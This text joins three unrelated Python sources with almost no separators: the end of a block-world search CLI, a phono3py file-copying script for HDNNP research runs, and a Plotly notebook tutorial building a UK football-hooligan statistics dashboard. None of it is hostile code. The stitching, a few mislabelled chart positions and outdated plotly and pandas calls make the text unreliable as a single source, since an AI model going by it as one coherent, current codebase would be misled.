# (Fragment of a block-world search CLI; the top of the file, including the argument-count
# check that this usage message belongs to, is truncated in the source.)
        print('Usage:\npython3 {} [solution_file_name]'.format(argv[0]))
        exit(1)
    problemFile = argv[2]
    outputFile = ''
    if len(argv) == 4:
        outputFile = argv[3]
    init, goal, cubes = openProblem(problemFile)
    # Initialize initial and goal states.
    initialState = State(init)
    goalState = State(goal)
    algorithm = argv[1]
    t1 = perf_counter()
    if algorithm == 'breadth':
        solution, iters = breadthFirstSearch(initialState, goalState)
    elif algorithm == 'depth':
        solution, iters = depthFirstSearch(initialState, goalState)
    elif algorithm == 'best' or algorithm == 'astar':
        solution, iters = heuristicSearch(initialState, goalState, algorithm)
    else:
        raise Exception('Unknown algorithm. Available : breadth, depth, best, astar')
    t2 = perf_counter()
    print('| Problem name: {}'.format(' ' * 10 + problemFile))
    print('| Algorithm used: {}'.format(' ' * 8 + algorithm))
    print('| Number of cubes: {}'.format(' ' * 7 + str(len(cubes))))
    print('| Cubes: {}'.format(' ' * 17 + str(' '.join(cubes))))
    if solution:
        print('| Solved in: {}'.format(' ' * 13 + str(t2 - t1)))
        print('| Algorithm iterations: {}'.format(' ' * 2 + str(iters)))
        print('| Moves: {}'.format(' ' * 17 + str(len(solution))))
        print('| Solution:' + ' ' * 15 + 'Found!')
        writeSolution(solution, outputFile)
    else:
        print('| Solution:' + ' ' * 15 + 'NOT found, search timed out.')

if __name__ == '__main__':
    main(argv)

tools/AI-MD/createphono3py-2-LC7.py
# -*- coding: utf-8 -*-
import os
import shutil

"""
This script copies 3 files from the /predict-phono3py folder to the /predict-phono3py-2
folder, in order to run phono3py again with the new prediction_application.py, which adds
saving of symm_func to an npz file.
"""

def fileEdit(datadir):
    copiedfile = ['POSCAR-unitcell', 'phono3pyPrep.py', 'phono3pyRun.py']
    os.makedirs(datadir + "/predict-phono3py-2")
    dirorg = datadir + "/predict-phono3py/"
    dirdest = datadir + "/predict-phono3py-2"
    for cpf in copiedfile:
        shutil.copy2(dirorg + cpf, dirdest)

if __name__ == '__main__':
    root = "/home/okugawa/HDNNP/Si-190808-md/1000K-LC7n/"
    grps = ['0.95', '0.97', '0.99', '1.0', '1.01', '1.03', '1.05', 'mix']
    for grp in grps:
        for i in range(1, 11):
            if grp == 'mix':
                for j in range(1, 11):
                    datadir = root + grp + "/" + str(i) + "/" + str(j)
                    fileEdit(datadir)
            else:
                datadir = root + grp + "/" + str(i)
                fileEdit(datadir)
        print(f'Copied phono3py-2 of /1000K-LC7/{grp}')

# coding: utf-8

# # Dashboards (3) - Football Hooligans in the UK

# In this final lesson on dashboards, we're going to make our most complex dashboard yet.
#
# We're going to make a dashboard which explores the phenomenon of football hooligans in the UK. I'm not a big football fan, but this is a very rich and interesting dataset which I'm sure you'll enjoy exploring.
#
# There are a few things you should know before we begin. Football in the UK takes place over several leagues. The highest league is the Premiership, then the Championship, then you have Leagues 1 and 2. Teams play each other twice, once in each home city. There are also parallel knockout competitions as well as international matches. Some people really love football.
#
# Our dashboard will have 12 cells in 3 rows of 4, and we're going to use an offset-grid style which you can see in the image below.
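# Since the grid image itself isn't reproduced here, the snippet below is a hedged preview
# of how a 3-row by 4-column offset grid like this can be declared as a make_subplots
# `specs` list (it mirrors the specs we build later in the lesson; `offset_grid_specs` is
# just an illustrative name). Wide cells span several columns, so wide and narrow charts
# alternate from row to row.

offset_grid_specs = [
    [{'colspan': 3}, None, None, {}],              # row 1: wide table + pie chart
    [{'colspan': 2}, None, {'colspan': 2}, None],  # row 2: bar chart + line chart
    [{'colspan': 3}, None, None, {}],              # row 3: wide bar chart + pie chart
]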
# # The top-left chart will be a table showing the football clubs whose fans have the most and least banning orders, whilst the top right pie chart will show the breakdown of banning orders by competition. # # The middle-left bar chart will show the number of arrests per 100,000 attendees, broken down by competition whilst the middle-right chart will show how the number of offenses has changed over time. # # Finally, the bottom-left bar chart will show how the types of offenses change depending on the competition whilst the bottom-right pie chart will show the split of offenses by whether the team was playing at home or away. # # The plan of our dashboard is shown below: # # ## Module Imports # In[5]: #plotly.offline doesn't push your charts to the clouds import plotly.offline as pyo #allows us to create the Data and Figure objects from plotly.graph_objs import * #plotly.plotly pushes your charts to the cloud import plotly.plotly as py #pandas is a data analysis library import pandas as pd from pandas import DataFrame # #### New Modules: # # Because we're making a table, we need to get the create_table() function from the Figure Factory. You may remember that we have to put a table in a dashboard in a very specific way, without using the make_subplots(). # # Regardless, we'll import the make subplots to help us apply the complex layout of the dashboard. # In[6]: from plotly.tools import FigureFactory as FF, make_subplots # In[7]: #lets us see the charts in an iPython Notebook pyo.offline.init_notebook_mode() # run at the start of every ipython # ## Getting the data # # I have prepared five datasets for us to use to make this dashboard. They all come from different tables in the same source dataset. Let's have a look at them before we start: # #### Number of banning orders by club and league # We'll use this dataset to create the table and pie chart in the top row of the dashboard. The charts will show respectively, the best and worst clubs for banning orders, and the best and worst competitions for banning orders. # In[8]: banningOrders = pd.read_csv('http://www.richard-muir.com/data/public/csv/BanningOrdersByClubAndLeague.csv', index_col = 0) banningOrders.head() # #### Arrests per 100,000 attendees # # We'll use this dataset to create the bar in the middle-right cell of the dashboard. This chart will show the number of arrests per 100,000 attendees broken down by competition. # In[9]: arrests = pd.read_csv('http://www.richard-muir.com/data/public/csv/ArrestsPer100kByLeague.csv', index_col = 0) arrests.head() # #### Offenses by year and league # # We'll use this dataset to create the line chart showing the time series of the number of offenses by league. This chart will go in the middle-right cell. # In[10]: offenses = pd.read_csv('http://www.richard-muir.com/data/public/csv/OffensesByYearAndLeague.csv', index_col = 0) offenses.head() # #### Types of offense # # This dataset shows the types of offense, broken down by competition. We'll use this to create the grouped bar chart in the bottom-left cell. # In[11]: typesOffense = pd.read_csv('http://www.richard-muir.com/data/public/csv/TypesOfOffensesByLeague.csv', index_col = 0) typesOffense.head() # #### Arrests at home and away # # This dataset shows the number of arrests at home, away and neutral football matches. 
We'll use this to create the pie chart in the bottom-right corner; # In[12]: homeAway = pd.read_csv('http://www.richard-muir.com/data/public/csv/ArrestsAtHomeAndAway.csv', index_col = 0) homeAway.head() # ## (2) Making the table # # If you're following along with the videos, this is where the second lesson starts. # # We're going to make the table which shows the five best and worst performing clubs by the number of arrests their fans have. # # We need to make this table first, and then add all the other charts around it, but let's get the styling right for the table before we go any further. # # We need to take the top and bottom five clubs from the dataset and save them as new DataFrames. The dataset is already sorted, so we can use DataFrame.head() and DataFrame.tail() to get the rows we need. # # We're also going to make a spacing row as its own DataFrame. We'll use this to separate the top and bottom five clubs to indicate to the reader that there are many more. # # We can then concatenate these three tables together and add in some spacing columns to reduce the size of the index column. # In[13]: top5 = banningOrders.head(5) bottom5 = banningOrders.tail(5) middle = pd.DataFrame.from_dict({'League' : ['...'], 'Club' : ['...'], 'Banning Orders' : ['...']}).set_index('Club', drop = False) bestWorst = pd.concat([top5, middle, bottom5]) bestWorst[''] = '' bestWorst[' '] = ' ' bestWorst[' '] = ' ' bestWorst = bestWorst[['League','', 'Club',' ','Banning Orders', ' ']] bestWorst # Let's now make a Plotly table from this DataFrame. I'm calling it 'hooligans' because this object will eventually become our final dashboard. # # We want to set an index column and an index title, and reduce the height_constant slightly to compress the table a little. # In[14]: hooligans = FF.create_table(bestWorst, index=True, index_title='Rank', height_constant = 20,) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-0.png") # # ### Styling the table # # Let's right-align the numbers in the Banning Orders column. We need to make sure that we don't select the numbers in the Rank index. # # We'll do this by only taking annotations that have an x-position greater than 3. The annotations in the Club column are all positioned at x = 2.55, so anything to the left of this will be in the Banning Orders column. # # In[15]: hooligans['layout']['annotations'][10] # In[16]: for ann in hooligans['layout']['annotations']: if ann['x'] > 3: ann['xanchor'] = 'right' ann['x'] += 0.9 pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-1.png") # # Let's now change the colour of the table. We're going to edit the colours used in the colorscale and z-index. # # Rather than alternating colours for the rows, we'll set the worst five clubs to be coloured different shades of red, and the best five to be in green and white. # # We'll also change the colour of the index text to be black and the background colour of the index cells to white. 
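# Before we start editing, it helps to know how the figure factory stores a table: the cell
# text lives in layout annotations, while the cell backgrounds come from a heatmap-like trace
# whose z values are mapped through a colorscale. A quick (hedged) way to peek at those pieces:

print(len(hooligans['layout']['annotations']))   # one annotation per cell of text
print(hooligans['data'][0]['colorscale'])        # the default alternating-row colours
print(hooligans['data'][0]['z'][:2])             # z values that drive the row colours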
# In[17]: #Changing the annotation colour: for ann in hooligans['layout']['annotations']: if ann['font']['color'] == '#ffffff': ann['font']['color'] = 'black' pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-2.png") # # In order to change the colour of the cells we need to change the color_scale and the z-index of the cells. # # Let's change the colour of the index row and column first: # In[18]: hooligans['data'][0]['colorscale'][0][1] = '#ffffff' pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-3.png") # # Here's the green and red colour we'll use: # In[19]: red = '#E61A1A' green = '#1FAD39' # Let's now change the z-values for each row, and attach the relevant colour to the colorscale. # # We want each row to have a different z-index, but we'll leave the middle row in white. # # The values for the z-index must be spread out so that the colour scale doesn't fade quickly from green to red, instead, the first 5 rows should be slightly different shades of green, whilst the last five should be slightly different shades of red. # # By setting the z-index of the first five rows to be a small number, we're ensuring that these will be coloured green. The z-index of the last five rows is very large compared to the first. This means that the gradient of these rows will be applied properly # In[20]: for i, row in enumerate(hooligans['data'][0]['z']): # Setting the green rows if i != 0 and i < 6: hooligans['data'][0]['z'][i] = [0] + [i for j in range(6)] # Setting the white spacer row if i == 6: hooligans['data'][0]['z'][i] = [0, 0, 0, 0, 0, 0, 0] # setting the red rows if i > 6: hooligans['data'][0]['z'][i] = [0] + [i * 10 for j in range(6)] hooligans['data'][0]['z'] # Now let's change the colour scale. We need to make sure that the rows with a z-index of 0 remain white, but that the other rows will change from green to red. # # I've set the colorscale so that any rows with a z-index of 0 will be white, then, the rows with a low z-index will be green, and those with a high z-index will be red. # # Setting the zmin and zmax makes sure that the colours will be represented properly: # In[21]: hooligans['data'][0]['colorscale'] = [[0, '#ffffff'], [0.1, green], [1, red]] hooligans['data'][0]['zmin'] = 0 hooligans['data'][0]['zmax'] = 90 pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-4.png") # # ## (3) Creating the dashboard object # # For those following along with the videos, this is where the third lesson starts. # # Now we've created the initial table we can build the dashboard around it. We did this in the previous section with a single chart, but we're now going to add five more. # # We have to add the other plots by updating the domains and anchor points of the additional axes. Let's use the make_subplots() function to create a template which we can then apply to our dashboard. 
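# What we'll actually copy across from that template are each generated axis's 'domain'
# (the fraction of the figure's width or height the subplot occupies) and its 'anchor'
# (the counterpart axis it's paired with). A hedged, toy illustration on a small 1x2 grid
# (`toy` is just an illustrative throwaway figure, not part of the dashboard):

toy = make_subplots(rows=1, cols=2, print_grid=False)
for ax in ('xaxis1', 'xaxis2'):
    print(ax, toy['layout'][ax]['domain'], toy['layout'][ax].get('anchor'))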
# In[22]: template = make_subplots(rows = 3, cols = 4, specs = [[{'colspan' : 3}, None, None, {}], [{'colspan' : 2}, None, {'colspan' : 2}, None], [{'colspan' : 3}, None, None, {}]]) template # Let's take the layout from our subplots object and transplant that into our table to get the axis domains right. # # First we're going to update the axes for the table. Let's also expand the height and width to the full size of the dashboard: # In[23]: hooligans['layout']['xaxis'].update(template['layout']['xaxis1']) hooligans['layout']['yaxis'].update(template['layout']['yaxis1']) hooligans['layout'].update({'height' : 1000, 'width' : 1000}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-5.png") # # Now, let's add in the other axes: # In[24]: for axis in range(2, 7): hooligans['layout'].update({'xaxis{}'.format(axis) : template['layout']['xaxis{}'.format(axis)]}) hooligans['layout'].update({'yaxis{}'.format(axis) : template['layout']['yaxis{}'.format(axis)]}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-6.png") # # # Adding the other charts # # For those of you following the videos, this is where the fourth lesson starts. # # Let's now add the other charts to our dashboard. # # ## (4) Banning orders by competition # # This pie chart will show the number of banning order by competition. We'll use the same DataFrame that we used for the table, but in order to get the total number of banning orders in each competition, we have to use the pandas.DataFrame.groupby() method to aggregate the data. We'll also sort the data in descending order. # In[25]: totalByCompetition = banningOrders.groupby(by='League', ).sum().sort_values(by='Banning Orders', ascending = False) totalByCompetition # Let's now make this pie chart. I'm going to set the colours for the six different competitions here as well. There are only four in this pie chart, but in the arrests per competition dataset, there are six. We want the colours for the competitions to be consistent throughout this dashboard. # # We're also going to set the legendgroup so we can space the legend items out, and set an insidetextfont and outsidetextfont so that the segment labels are nice and big. We'll also set the hoverinfo to just show the label, percent and value. # In[26]: competitionColours = ["rgb(228,204,241)", "rgb(132,109,255)", "rgb(246,131,218)", "rgb(216,160,108)", "rgb(93,54,118)", "rgb(154,16,115)"] banningOrdersPie = {'type' : 'pie', 'labels' : totalByCompetition.index, 'values' : totalByCompetition['Banning Orders'], 'hoverinfo' : 'label+percent+value', 'legendgroup' : 'banningOrderPie', 'insidetextfont' : {'size' : 16}, 'outsidetextfont' : {'size' : 16}, 'marker' : {'colors' : competitionColours[:4], 'line' : {'width' : 1, 'color' : '#333'}}, 'direction' : 'clockwise'} pyo.iplot([banningOrdersPie]) py.image.save_as([banningOrdersPie], r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-7.png") # # Now let's add this pie chart to the dashboard by setting the domain. 
I'm going to move it slightly to the right to prevent it overlapping the table. # In[27]: print(hooligans['layout']['xaxis2']) print(hooligans['layout']['yaxis2']) # In[28]: banningOrdersPie.update({'domain' : { 'x' : [0.78, 1.0], 'y' : [0.7111, 1.0]} }) hooligans['data'].append(banningOrdersPie) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-8.png") # # Now let's remove the axis marks from the axes under this pie chart and from the axes in the bottom-right cell; we're going to put a pie chart there later. # In[29]: blankAxis = {'showline' : False, 'zeroline' : False, 'ticks' : None, 'showticklabels' : False, 'showgrid' : False} for axis in [2, 6]: hooligans['layout']['xaxis{}'.format(axis)].update(blankAxis) hooligans['layout']['yaxis{}'.format(axis)].update(blankAxis) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-9.png") # # ## (5) Number of arrests per 100,000 attendees # # If you're following the video lessons, the fifth lesson starts here. # # Now let's add this bar chart showing, for each competition, the number of arrests per 100,000 attendees. We'll also plot a line showing the average so we can compare each competition to this average. # # Let's sort the arrests DataFrame by descending value and create a text column so we can format the number to two decimal places. # In[30]: arrests = arrests.rename(columns={'Arrests per 100,000 attendees (2015-16)' : 'Arrests'}, ).sort_values(by='Arrests', ascending = False) arrests['text'] = arrests.apply(lambda x: "{}
{:.2f} arrests per 100,000".format(x['Competition'], x['Arrests']), axis = 1) arrests # We now need to remove the 'Total' row from the DataFrame - we don't want to plot this as a bar, but we do need to keep the information so we can plot a line as an annotation. # # I'm also going to change the text for 'National League National Division', 'Football League Trophy' and 'European competitions' to reduce the size of the ticklabel. # In[31]: total = arrests.loc[10, ['Competition','Arrests']] total # In[32]: arrests = arrests[arrests['Competition'] != 'Total'] arrests.loc[4, 'Competition'] = 'National League' arrests.loc[7, 'Competition'] = 'Football League' arrests.loc[8, 'Competition'] = 'European' arrests # Let's now append this bar trace to the dashboard. We're going to colour red all of the bars that are above the average, and colour green those that are below. Only the last two are below the average (these are the two competitions with the largest attendance). # # We need to anchor this bar trace to the 'x3' and 'y3' axes: # In[33]: hooligans['data'].append({'type' : 'bar', 'x' : arrests['Competition'], 'y' : arrests['Arrests'], 'opacity' : 0.6, 'text' : arrests['text'], 'hoverinfo' : 'text', 'showlegend' : False, 'marker' : {'color' : [red for i in range(8)] + [green, green], 'line' : {'width' : 1, 'color' : '#333'}}, 'xaxis' : 'x3', 'yaxis' : 'y3'}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-10.png") # # Now let's add the average line and an explaining annotation to the layout. We'll also need to anchor both of these to the 'x3' and 'y3' axes. # # We're going to use an arrow to move the annotation away from the average line; it is difficult to read when the text is over the bars. By setting the 'ayref' and 'ay' parameters, we can move the annotation text away from the location where the arrow points. Because the 'ay' value is negative, the annotation will move up relative to the point of the arrow. # In[34]: hooligans['layout']['annotations'].append({'text' : "Average in all competitions: {:.2f}".format(total['Arrests']), 'showarrow' : True, 'ayref' : 'y3', 'ay' : -90, 'xanchor' : 'middle', 'x' : 5, 'xref' : 'x3', 'y' : total['Arrests'] * 1.05, 'yref' : 'y3'}) hooligans['layout']['shapes'] = [{'type' : "line", 'x0' : -0.5, 'x1' : 10.5, 'y0' : total['Arrests'], 'y1' : total['Arrests'], 'xref' : 'x3', 'yref' : 'y3'}] pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-11.png") # # Let's now style the axes for these plots. I'm going to change the domain of the x-axis slightly to allow room for the y-axis title. # In[35]: hooligans['layout']['xaxis3'].update({'tickangle' : 45, 'domain' : [0.05, 0.475]}) hooligans['layout']['yaxis3'].update({'title' : 'Arrests/100,000 attendees'}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-12.png") # # ## (6) Adding the line chart showing the change in the number of arrests # # For those of you following the video, the sixth lesson starts here. 
# # We'll now add the line chart which will give us a time series of the number of arrests in each competition. # # First I'll rename the columns to just show the year. I'll do this with a dictionary comprehension. # # I'll also change the league name for 'National League National Division clubs', as well as removing the word 'clubs' from every row. It's possible to do this using the pd.DataFrame.replace() method, but I had problems getting this to work, so I went for a guaranteed method! # In[36]: offenses.rename(columns={col : col[:4] if col != 'League' else col for col in offenses.columns}, inplace = True) for loc in range(6): offenses.loc[loc, 'League'] = offenses.loc[loc, 'League'].replace(" clubs", '') offenses.loc[4, 'League'] = 'National League' offenses # Finally, before we plot this, we're going to transpose the DataFrame to make it easier to plot. Let's set the index to be the League column, then call DataFrame.T to switch the row and column indexes round: # In[37]: offenses.set_index('League',drop = True, inplace = True) offenses = offenses.T offenses # Now let's plot this line chart, not forgetting to set the xaxis and yaxis reference to x4 and y4 respectively. # In[38]: lines = [] years = list(range(2011, 2016)) for i, comp in enumerate(offenses.columns): lines.append({'type' : 'scatter', 'mode' : 'markers+lines', 'x' : years, 'y' : offenses[comp], 'marker' : {'color' : competitionColours[i], 'size' : 8, 'line' : {'width' : 1, 'color' : '#333'}}, 'name' : comp, 'legendgroup' : 'offensesLineChart', 'xaxis' : 'x4', 'yaxis' : 'y4' }) hooligans['data'] += lines pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-13.png") # # Much as we did for the previous chart, I'll now change the domain on the xaxis to make space for a yaxis title: # In[39]: hooligans['layout']['xaxis4'].update({'domain' : [0.55, 1],}) hooligans['layout']['yaxis4'].update({'title' : 'Arrests'}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-14.png") # # ## (7) Types of offense by competition # # The seventh video lesson starts here. # # We'll now populate the bottom-left cell with a bar chart showing the number of each type of offense by competition. # # We've got to prepare the DataFrame before we can plot it. # # I'll firstly change the name of 'National League National Division'. # # Next I'm going to set the index to the Competition column so we can more easily loop through the columns of offenses. # # Next, we'll sort the columns from most offenses to least. For simplicity we'll only sort based on the 'Premier League' row. To sort the columns, we pass axis = 1 to the sort_values() function. 
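# Sorting columns (rather than rows) this way can look surprising, so here's a tiny toy
# illustration on made-up data before we apply it to the real DataFrame: with axis = 1,
# sort_values orders the *columns* by the values found in the row named in `by`.

toy = pd.DataFrame({'A': [3, 10], 'B': [1, 20], 'C': [2, 30]},
                   index=['Premier League', 'Championship'])
print(toy.sort_values(by='Premier League', axis=1, ascending=False).columns.tolist())
# ['A', 'C', 'B'] because the 'Premier League' row holds 3, 2, 1 for those columns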
# In[40]: #Changing name typesOffense.loc[4, 'Competition'] = 'National League' #Setting index typesOffense.set_index('Competition', drop=True, inplace=True) #Sorting the order of the columns typesOffense.sort_values(by='Premier League', axis = 1, ascending = False, inplace = True) typesOffense # Now we'll combine the final 3 columns into an 'Other Offense' category: # In[41]: otherOffenses = ['Breach of banning order ','Racist and indecent chanting','Possession of an offensive weapon'] typesOffense['Other Offenses'] = typesOffense[otherOffenses].sum(axis = 1) typesOffense.drop(otherOffenses, axis = 1, inplace = True) typesOffense # In order to combine the last three rows, we have to select them separately using the .loc indexer, then sum just those rows and create a DataFrame from them. # # Next, we'll tranpose and rename the DataFrame before appending it to the original. # # Finally, we'll drop the columns which we summed. # In[42]: competitions = ['Football League Trophy','Champions League and Europa League','Internationals'] #Making a DataFrame of the sum of the final three rows otherComps = DataFrame(typesOffense.loc[competitions, :].sum(axis = 0)) #Transposing that DataFrame and renaming the index otherComps = otherComps.T.rename(index={0 : 'Other Competitions'}) #Appending the new rows to the bottom, and dropping the three which comprise the new row typesOffense = typesOffense.append(otherComps) typesOffense.drop(competitions, axis=0, inplace = True) typesOffense # Finally, we'll get a list of the types of offense columns which we'll loop through to make the bar chart. We'll also use this list to add a text column for each type of offense. # In[43]: #List of columns offenseCols = typesOffense.columns.tolist() #Creating text columns for col in offenseCols: typesOffense['{}_text'.format(col,)] = typesOffense[col].apply(lambda x: '{}
{} offenses'.format(col, x)) typesOffense.head() # First of all let's get a new colour scheme. The colour here will represent the different types of offense: # In[44]: offenseColours = ["rgb(250,46,85)", "rgb(136,20,72)", "rgb(252,178,199)", "rgb(250,46,85)", "rgb(249,13,160)", "rgb(202,98,133)", "rgb(154,42,6)", "rgb(240,126,79)", "rgb(83,12,153)"] # Now we can add our bar traces to the dashboard. We'll put the competition type on the x-axis: # In[45]: bars = [] for i, off in enumerate(offenseCols): hooligans['data'].append({'type' : 'bar', 'x' : typesOffense.index, 'y' : typesOffense[off], 'text' : typesOffense['{}_text'.format(off)], 'name' : off, 'opacity' : 0.7, 'hoverinfo' : 'text', 'legendgroup' : 'typesOffense', 'marker' : {'color' : offenseColours[i], 'line' : {'width' : 0.5, 'color' : '#333'}}, 'xaxis' : 'x5', 'yaxis' : 'y5' }) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-15.png") # # Let's now change the domain of the x5 and y5 axes so we can see the ticklabels for this chart: # In[46]: hooligans['layout']['xaxis5'].update({'domain' : [0.06, 0.69]}) hooligans['layout']['yaxis5'].update({'domain' : [0.08, 0.26667], 'title' : 'Number of offenses'}) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-16.png") # # ## (8) Showing offenses by home and away # # The eighth video lesson starts here. # # We'll now make the final chart for this dashboard. We're going to make a pie chart that shows the breakdown of offenses by whether the supporter/offender's team was playing at home or away. # # The data is below. First of all we need to sum the DataFrame. This will give us the totals for Home, Away and Neutral. It will also concatenate the club names together, but we'll drop this column. Next we'll rename the resulting column to N and finally, sort the DataFrame. # In[47]: homeAway = DataFrame(homeAway.sum()) homeAway = homeAway.drop(['Club'], axis = 0, ).rename(columns={0 : 'N'},).sort_values(by='N', ascending=False) homeAway # Let's now create our pie chart. We'll use red for away, green for home and blue for neutral. I'll also set an insidetextfont and outsidetextfont so we can easily read the labels when the chart is on the dashboard. 
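# One quick aside on the .sum() step above before we build the pie: summing a whole
# DataFrame adds the numeric columns but *concatenates* string columns, which is exactly
# why the 'Club' row had to be dropped. A toy illustration with made-up data:

toy = DataFrame({'Club': ['Leeds', 'Barnsley'], 'Home': [3, 1], 'Away': [2, 5]})
print(toy.sum())
# Club    LeedsBarnsley   <- meaningless string concatenation, hence the drop(['Club'])
# Home    4
# Away    7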
# In[48]: competitionColours = ["rgb(228,204,241)", "rgb(132,109,255)", "rgb(246,131,218)", "rgb(216,160,108)", "rgb(93,54,118)", "rgb(154,16,115)"] homeAwayColours = [red, green, "rgb(132,109,255)"] homeawayPie = {'type' : 'pie', 'labels' : homeAway.index, 'values' : homeAway['N'], 'hoverinfo' : 'label+percent+value', 'legendgroup' : 'homeAway', 'insidetextfont' : {'size' : 16}, 'outsidetextfont' : {'size' : 16}, 'marker' : {'colors' : homeAwayColours, 'line' : {'width' : 1, 'color' : '#333'}}, 'direction' : 'clockwise'} pyo.iplot([homeawayPie]) py.image.save_as([homeawayPie], r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-17.png") # # Let's now append this to the dashboard; we'll need to set the domain of this pie chart to be the same as the x6 and y6 axes: # In[49]: print(hooligans['layout']['xaxis6']['domain']) print(hooligans['layout']['yaxis6']['domain']) # In[50]: homeawayPie.update({'domain' : { 'x' : [0.78, 1.0], 'y' : [0, 0.267]} }) hooligans['data'].append(homeawayPie) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-18.png") # # ## (9) Adding titles and finetuning the layout # # The ninth and final video lesson starts here. # # We've now added all the charts to our dashboard. There's still a few things to do before we finish: # 1. Add chart titles # 2. Add a title for the dashboard # 3. Set hovermode to closest # 4. Spread out the legend items # # ### Adding chart titles # # The easiest way to add chart titles is by using the make_subplots() function to generate a new subplot grid with titles. These titles are stored as annotations. We can then take the list of annotations from the subplot grid and put it straight into the dashboard. # # In[51]: template = make_subplots(rows = 3, cols = 4, specs = [[{'colspan' : 3}, None, None, {}], [{'colspan' : 2}, None, {'colspan' : 2}, None], [{'colspan' : 3}, None, None, {}]], subplot_titles = ['Most and least arrests by club', 'Arrests by competition', 'Arrests per 100,000 attendees', 'Total arrests by season', 'Types of offense', 'Offenses at home and away'], print_grid =False) template['layout']['annotations'] # Let's add these annotations to our dashboard. We'll also add in our dashboard title. # # We'll probably have to move the annotations about and change the domain of some of the charts to prevent any overlap, but let's take a look at the dashboard first: # In[52]: titleAnn = [{'text' : 'Football Hooligans in the UK', 'showarrow' : False, 'xref' : 'paper', 'yref' : 'paper', 'x' : 0.5, 'y' : 1, 'xanchor' : 'center', 'yanchor' : 'bottom', 'font' : {'size' : 30}}] hooligans['layout']['annotations'] += (template['layout']['annotations'] + titleAnn) pyo.iplot(hooligans) py.image.save_as(hooligans, r"C:\Users\Rytch\Google Drive\Financial\Passive Income\Online courses\Plotly\Course Content\Lessons\(10) Dashboards\Notebooks\images\Dashboards (3) - Football Hooligans in the UK\pyo.iplot-19.png") # # So you can see that we've got a little bit of work to do to move the annotations and charts around so they don't overlap. We'll start at the top and move the table down by changing the domain of the y1 axis. We'll also change the domain of the pie trace so that it stays aligned with the table. 
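# A short recap of the two positioning mechanisms this dashboard relies on (a hedged
# reminder using values that already appear above; `bar_like` and `pie_like` are just
# illustrative names): cartesian traces such as bars and lines are placed by pointing them
# at an axis pair, and those axis objects own the domain, whereas pie traces have no axes
# and therefore carry their own 'domain' directly.

bar_like = {'type': 'bar', 'xaxis': 'x3', 'yaxis': 'y3'}                      # placed via xaxis3/yaxis3
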